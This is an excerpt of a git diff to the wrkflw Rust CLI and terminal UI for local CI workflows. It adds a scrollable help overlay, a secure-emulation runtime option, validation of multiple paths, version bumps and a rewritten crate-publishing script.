Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"?",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle help overlay"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"q",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Quit application"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"💡 TIPS",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("emulation mode", Style::default().fg(Color::Red)),
|
||||
Span::raw(" when containers"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" provides sandboxing"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for untrusted workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("validation mode", Style::default().fg(Color::Green)),
|
||||
Span::raw(" to check"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" workflows without execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" on failure"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
|
||||
];
|
||||
|
||||
// Apply scroll offset to the content
|
||||
let left_help_text = if scroll_offset < left_help_text.len() {
|
||||
left_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
let right_help_text = if scroll_offset < right_help_text.len() {
|
||||
right_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
// Render left column
|
||||
let left_widget = Paragraph::new(left_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
|
||||
.title(Span::styled(
|
||||
" WRKFLW Help - Controls & Features ",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(help_widget, area);
|
||||
// Render right column
|
||||
let right_widget = Paragraph::new(right_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Interface Guide & Tips ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(left_widget, chunks[0]);
|
||||
f.render_widget(right_widget, chunks[1]);
|
||||
}
|
||||
|
||||
// Render a help overlay
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
|
||||
let size = f.size();
|
||||
|
||||
// Create a slightly smaller centered modal
|
||||
let width = size.width.min(60);
|
||||
let height = size.height.min(20);
|
||||
// Create a larger centered modal to accommodate comprehensive help content
|
||||
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
|
||||
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
|
||||
let x = (size.width - width) / 2;
|
||||
let y = (size.height - height) / 2;
|
||||
|
||||
@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
height,
|
||||
};
|
||||
|
||||
// Create a clear background
|
||||
// Create a semi-transparent dark background for better visibility
|
||||
let clear = Block::default().style(Style::default().bg(Color::Black));
|
||||
f.render_widget(clear, size);
|
||||
|
||||
// Render the help content
|
||||
render_help_tab(f, help_area);
|
||||
// Add a border around the entire overlay for better visual separation
|
||||
let overlay_block = Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Double)
|
||||
.style(Style::default().bg(Color::Black).fg(Color::White))
|
||||
.title(Span::styled(
|
||||
" Press ? or Esc to close help ",
|
||||
Style::default()
|
||||
.fg(Color::Gray)
|
||||
.add_modifier(Modifier::ITALIC),
|
||||
));
|
||||
|
||||
f.render_widget(overlay_block, help_area);
|
||||
|
||||
// Create inner area for content
|
||||
let inner_area = Rect {
|
||||
x: help_area.x + 1,
|
||||
y: help_area.y + 1,
|
||||
width: help_area.width.saturating_sub(2),
|
||||
height: help_area.height.saturating_sub(2),
|
||||
};
|
||||
|
||||
// Render the help content with scroll support
|
||||
render_help_content(f, inner_area, scroll_offset);
|
||||
}
|
||||
|
||||
@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
f.render_widget(search_block, chunks[1]);
|
||||
}
|
||||
|
||||
// Combine application logs with system logs
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Now all logs should have timestamps in the format [HH:MM:SS]
|
||||
|
||||
// Process app logs
|
||||
for log in &app.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Process system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Filter logs based on search query and filter level
|
||||
let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
|
||||
all_logs
|
||||
.iter()
|
||||
.filter(|log| {
|
||||
let passes_filter = match &app.log_filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if app.log_search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&app.log_search_query.to_lowercase())
|
||||
};
|
||||
|
||||
passes_filter && matches_search
|
||||
})
|
||||
.cloned()
|
||||
.collect::<Vec<String>>()
|
||||
} else {
|
||||
all_logs.clone() // Clone to avoid moving all_logs
|
||||
};
|
||||
// Use processed logs from background thread instead of processing on every frame
|
||||
let filtered_logs = &app.processed_logs;
|
||||
|
||||
// Create a table for logs for better organization
|
||||
let header_cells = ["Time", "Type", "Message"]
|
||||
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = filtered_logs.iter().map(|log_line| {
|
||||
// Parse log line to extract timestamp, type and message
|
||||
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
};
|
||||
|
||||
let (log_type, log_style, _) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red), log_line.as_str())
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
(
|
||||
"WARN",
|
||||
Style::default().fg(Color::Yellow),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
(
|
||||
"SUCCESS",
|
||||
Style::default().fg(Color::Green),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
(
|
||||
"TRIG",
|
||||
Style::default().fg(Color::Magenta),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray), log_line.as_str())
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line.as_str()
|
||||
};
|
||||
|
||||
// Highlight search matches in content if search is active
|
||||
let mut content_spans = Vec::new();
|
||||
if !app.log_search_query.is_empty() {
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = app.log_search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + app.log_search_query.len();
|
||||
content_spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
content_spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
|
||||
Row::new(vec![
|
||||
Cell::from(timestamp),
|
||||
Cell::from(log_type).style(log_style),
|
||||
Cell::from(Line::from(content_spans)),
|
||||
])
|
||||
});
|
||||
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
|
||||
let rows = filtered_logs
|
||||
.iter()
|
||||
.map(|processed_log| processed_log.to_row());
|
||||
|
||||
let content_idx = if show_search_bar { 2 } else { 1 };
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@ use std::io;
|
||||
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
// Check if help should be shown as an overlay
|
||||
if app.show_help {
|
||||
help_overlay::render_help_overlay(f);
|
||||
help_overlay::render_help_overlay(f, app.help_scroll);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
}
|
||||
}
|
||||
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
|
||||
3 => help_overlay::render_help_tab(f, main_chunks[1]),
|
||||
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
|
||||
_ => {}
|
||||
}
|
||||
|
||||
|
||||
@@ -41,7 +41,8 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
.bg(match app.runtime_type {
|
||||
RuntimeType::Docker => Color::Blue,
|
||||
RuntimeType::Podman => Color::Cyan,
|
||||
RuntimeType::Emulation => Color::Magenta,
|
||||
RuntimeType::SecureEmulation => Color::Green,
|
||||
RuntimeType::Emulation => Color::Red,
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
@@ -108,6 +109,12 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::SecureEmulation => {
|
||||
status_items.push(Span::styled(
|
||||
" 🔒SECURE ",
|
||||
Style::default().bg(Color::Green).fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Emulation => {
|
||||
// No need to check anything for emulation mode
|
||||
}
|
||||
@@ -174,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
"[No logs to display]"
|
||||
}
|
||||
}
|
||||
3 => "[?] Toggle help overlay",
|
||||
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
|
||||
_ => "",
|
||||
};
|
||||
status_items.push(Span::styled(
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
|
||||
@@ -12,8 +12,8 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
|
||||
@@ -12,18 +12,18 @@ license.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Workspace crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.6.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.6.0" }
|
||||
wrkflw-gitlab = { path = "../gitlab", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.6.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.6.0" }
|
||||
wrkflw-ui = { path = "../ui", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.6.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.7.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
|
||||
wrkflw-ui = { path = "../ui", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
clap.workspace = true
|
||||
@@ -62,4 +62,4 @@ path = "src/lib.rs"
|
||||
|
||||
[[bin]]
|
||||
name = "wrkflw"
|
||||
path = "src/main.rs"
|
||||
path = "src/main.rs"
|
||||
|
||||
@@ -26,6 +26,9 @@ wrkflw validate
|
||||
wrkflw validate .github/workflows/ci.yml
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Run a workflow (Docker by default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
@@ -40,10 +43,11 @@ wrkflw tui --runtime podman
|
||||
|
||||
### Commands
|
||||
|
||||
- **validate**: Validate a workflow/pipeline file or directory
|
||||
- **validate**: Validate workflow/pipeline files and/or directories
|
||||
- GitHub (default): `.github/workflows/*.yml`
|
||||
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
|
||||
- Exit code behavior (by default): `1` when validation failures are detected
|
||||
- Accepts multiple paths in a single invocation
|
||||
- Exit code behavior (by default): `1` when any validation failure is detected
|
||||
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
|
||||
|
||||
- **run**: Execute a workflow or pipeline locally
|
||||
|
||||
@@ -10,8 +10,10 @@ enum RuntimeChoice {
|
||||
Docker,
|
||||
/// Use Podman containers for isolation
|
||||
Podman,
|
||||
/// Use process emulation mode (no containers)
|
||||
/// Use process emulation mode (no containers, UNSAFE)
|
||||
Emulation,
|
||||
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
@@ -20,6 +22,7 @@ impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
|
||||
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
|
||||
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
|
||||
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -48,8 +51,9 @@ struct Wrkflw {
|
||||
enum Commands {
|
||||
/// Validate workflow or pipeline files
|
||||
Validate {
|
||||
/// Path to workflow/pipeline file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
|
||||
#[arg(value_name = "path", num_args = 0..)]
|
||||
paths: Vec<PathBuf>,
|
||||
|
||||
/// Explicitly validate as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
@@ -69,7 +73,7 @@ enum Commands {
|
||||
/// Path to workflow/pipeline file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation)
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
@@ -91,7 +95,7 @@ enum Commands {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation)
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
@@ -266,6 +270,28 @@ fn is_gitlab_pipeline(path: &Path) -> bool {
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() {
|
||||
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
|
||||
let default_panic_hook = std::panic::take_hook();
|
||||
std::panic::set_hook(Box::new(move |info| {
|
||||
let mut is_broken_pipe = false;
|
||||
if let Some(s) = info.payload().downcast_ref::<&str>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if let Some(s) = info.payload().downcast_ref::<String>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if is_broken_pipe {
|
||||
// Treat as a successful, short-circuited exit
|
||||
std::process::exit(0);
|
||||
}
|
||||
// Fallback to the default hook for all other panics
|
||||
default_panic_hook(info);
|
||||
}));
|
||||
|
||||
let cli = Wrkflw::parse();
|
||||
let verbose = cli.verbose;
|
||||
let debug = cli.debug;
|
||||
@@ -286,65 +312,78 @@ async fn main() {
|
||||
|
||||
match &cli.command {
|
||||
Some(Commands::Validate {
|
||||
path,
|
||||
paths,
|
||||
gitlab,
|
||||
exit_code,
|
||||
no_exit_code,
|
||||
}) => {
|
||||
// Determine the path to validate
|
||||
let validate_path = path
|
||||
.clone()
|
||||
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
|
||||
|
||||
// Check if the path exists
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
std::process::exit(1);
|
||||
}
|
||||
// Determine the paths to validate (default to .github/workflows when none provided)
|
||||
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
|
||||
vec![PathBuf::from(".github/workflows")]
|
||||
} else {
|
||||
paths.clone()
|
||||
};
|
||||
|
||||
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
|
||||
let force_gitlab = *gitlab;
|
||||
let mut validation_failed = false;
|
||||
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
for validate_path in validate_paths {
|
||||
// Check if the path exists; if not, mark failure but continue
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
validation_failed = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
println!("Validating {} workflow file(s)...", entries.len());
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
println!(
|
||||
"Validating {} workflow file(s) in {}...",
|
||||
entries.len(),
|
||||
validate_path.display()
|
||||
);
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
validation_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
}
|
||||
|
||||
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
|
||||
|
||||
@@ -1,71 +1,179 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Simple script to publish all wrkflw crates to crates.io in dependency order
|
||||
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
|
||||
|
||||
set -e
|
||||
|
||||
DRY_RUN=${1:-""}
|
||||
# Parse command line arguments
|
||||
COMMAND=${1:-""}
|
||||
VERSION_TYPE=${2:-""}
|
||||
DRY_RUN=""
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing wrkflw crates publication"
|
||||
else
|
||||
echo "🚀 Publishing wrkflw crates to crates.io"
|
||||
fi
|
||||
show_help() {
|
||||
echo "Usage: $0 <command> [options]"
|
||||
echo ""
|
||||
echo "Commands:"
|
||||
echo " version <type> Update versions across workspace"
|
||||
echo " Types: patch, minor, major"
|
||||
echo " publish Publish all crates to crates.io"
|
||||
echo " release <type> Update versions and publish (combines version + publish)"
|
||||
echo " help Show this help message"
|
||||
echo ""
|
||||
echo "Options:"
|
||||
echo " --dry-run Test without making changes (for publish/release)"
|
||||
echo ""
|
||||
echo "Examples:"
|
||||
echo " $0 version minor # Bump to 0.7.0"
|
||||
echo " $0 publish --dry-run # Test publishing"
|
||||
echo " $0 release minor --dry-run # Test version bump + publish"
|
||||
echo " $0 release patch # Release patch version"
|
||||
}
|
||||
|
||||
# Check if we're logged in to crates.io
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Publication order (respecting dependencies)
|
||||
CRATES=(
|
||||
"models"
|
||||
"logging"
|
||||
"utils"
|
||||
"matrix"
|
||||
"validators"
|
||||
"github"
|
||||
"gitlab"
|
||||
"parser"
|
||||
"runtime"
|
||||
"evaluator"
|
||||
"executor"
|
||||
"ui"
|
||||
"wrkflw"
|
||||
)
|
||||
|
||||
echo "📦 Publishing crates in dependency order..."
|
||||
|
||||
for crate in "${CRATES[@]}"; do
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "Testing $crate..."
|
||||
cd "crates/$crate"
|
||||
cargo publish --dry-run --allow-dirty
|
||||
echo "✅ $crate dry-run successful"
|
||||
else
|
||||
echo "Publishing $crate..."
|
||||
cd "crates/$crate"
|
||||
cargo publish --allow-dirty
|
||||
echo "✅ Published $crate"
|
||||
fi
|
||||
cd - > /dev/null
|
||||
|
||||
# Small delay to avoid rate limiting (except for the last crate and in dry-run)
|
||||
if [[ "$crate" != "wrkflw" ]] && [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo " Waiting 10 seconds to avoid rate limits..."
|
||||
sleep 10
|
||||
# Parse dry-run flag from any position
|
||||
for arg in "$@"; do
|
||||
if [[ "$arg" == "--dry-run" ]]; then
|
||||
DRY_RUN="--dry-run"
|
||||
fi
|
||||
done
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🎉 All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
||||
echo " ./publish_crates.sh"
|
||||
else
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
case "$COMMAND" in
|
||||
"help"|"-h"|"--help"|"")
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
"version")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
"publish")
|
||||
# publish command doesn't need version type
|
||||
;;
|
||||
"release")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required for release (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo "❌ Error: Unknown command '$COMMAND'"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Check if cargo-workspaces is installed
|
||||
if ! command -v cargo-workspaces &> /dev/null; then
|
||||
echo "❌ cargo-workspaces not found. Installing..."
|
||||
cargo install cargo-workspaces
|
||||
fi
|
||||
|
||||
# Check if we're logged in to crates.io (only for publish operations)
|
||||
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
# Function to update versions
|
||||
update_versions() {
|
||||
local version_type=$1
|
||||
echo "🔄 Updating workspace versions ($version_type)..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Simulating version update"
|
||||
echo ""
|
||||
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
|
||||
echo "Would execute: cargo workspaces version $version_type"
|
||||
echo ""
|
||||
echo "This would update all crates and their internal dependencies."
|
||||
echo "✅ Version update simulation completed (no changes made)"
|
||||
else
|
||||
cargo workspaces version "$version_type"
|
||||
echo "✅ Versions updated successfully"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to test build
|
||||
test_build() {
|
||||
echo "🔨 Testing workspace build..."
|
||||
if cargo build --workspace; then
|
||||
echo "✅ Workspace builds successfully"
|
||||
else
|
||||
echo "❌ Build failed. Please fix errors before publishing."
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to publish crates
|
||||
publish_crates() {
|
||||
echo "📦 Publishing crates to crates.io..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing publication"
|
||||
cargo workspaces publish --dry-run
|
||||
echo "✅ All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
